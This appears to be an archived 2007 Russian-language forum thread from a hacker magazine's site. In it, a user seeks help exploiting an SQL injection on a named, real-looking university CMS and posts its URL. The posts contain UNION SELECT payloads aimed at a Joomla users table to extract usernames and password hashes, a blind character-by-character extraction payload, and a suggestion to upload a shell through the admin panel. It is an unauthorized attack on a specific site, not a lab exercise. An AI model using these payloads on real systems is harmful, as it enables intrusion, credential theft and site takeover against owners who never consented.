Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

реализация SQL injection

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> реализация SQL injection
Имя
Сообщение << Старые топики   Новые топики >>
реализация SQL injection - 2007-04-10 22:55:35.083333   
ns4220

Сообщений: 3
Оценки: 0
Присоединился: 2007-04-10 21:16:52.580000
 Добрый день!

Есть некий сайт, на котором в одном месте неправильно обрабатывается входной параметр скрипта. Если поставить вместо одного из параметра кавычку получается следующее:

SELECT id,name,parent FROM jos_menu WHERE id = \' ORDER BY parent DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY parent DESC' at line 1
Раз так, то я сформировал следующий запрос:

...Itemid=1001 UNION SELECT id,username,password AS parent FROM jos_users
Добавил AS parent так как в оригинальном запросе есть ORDER BY.

Но это выводит такую ошибку:

SELECT id,name,parent FROM jos_menu WHERE id = 7c4d0718d9dac0b8c4dc69af91c3bf8a ORDER BY parent DESC Unknown column '7c4d0718d9dac0b8c4dc69af91c3bf8a' in 'where clause'
А если написать:

...Itemid=1001 UNION SELECT username,password,id AS parent FROM jos_users
То не вылетает никаких ошибок, но страница вылезает вся кривущая. Посоветуйте что делать?
Post #: 1
RE: реализация SQL injection - 2007-04-11 06:39:51.753333   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
 Ну так строки в запросе в кавычках должны быть, поэтому и ошибка…
WHERE id = '7c4d0718d9dac0b8c4dc69af91c3bf8a'
Post #: 2
RE: реализация SQL injection - 2007-04-11 17:14:58.770000   
BlackDoor

Сообщений: 200
Оценки: 0
Присоединился: 2007-02-16 06:55:09.780000
 Ты бы хоть название сайта написал[sm=mad.gif]
Post #: 3
RE: реализация SQL injection - 2007-04-12 00:27:45.240000   
ns4220

Сообщений: 3
Оценки: 0
Присоединился: 2007-04-10 21:16:52.580000
 Вот сайт:
http://szf.llu.lv/cms/index.php?option=com_content&task=blogcategory&id=24&Itemid=
Post #: 4
RE: реализация SQL injection - 2007-04-12 17:45:03.286666   
charli

Сообщений: 50
Оценки: 0
Присоединился: 2007-03-21 22:06:32.833333
 Itemid=1+and+ascii(substring((select+password+from+jos_users+limit+0,1),1,1))=$num/*
попробуй посимвольно там мд5 хеш 32 символа задолбаешся :)
это движок похош на joomla шелл в админке можно залить
Post #: 5
Страниц:  [1]
Все форумы >> [В Сети] >> реализация SQL injection







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.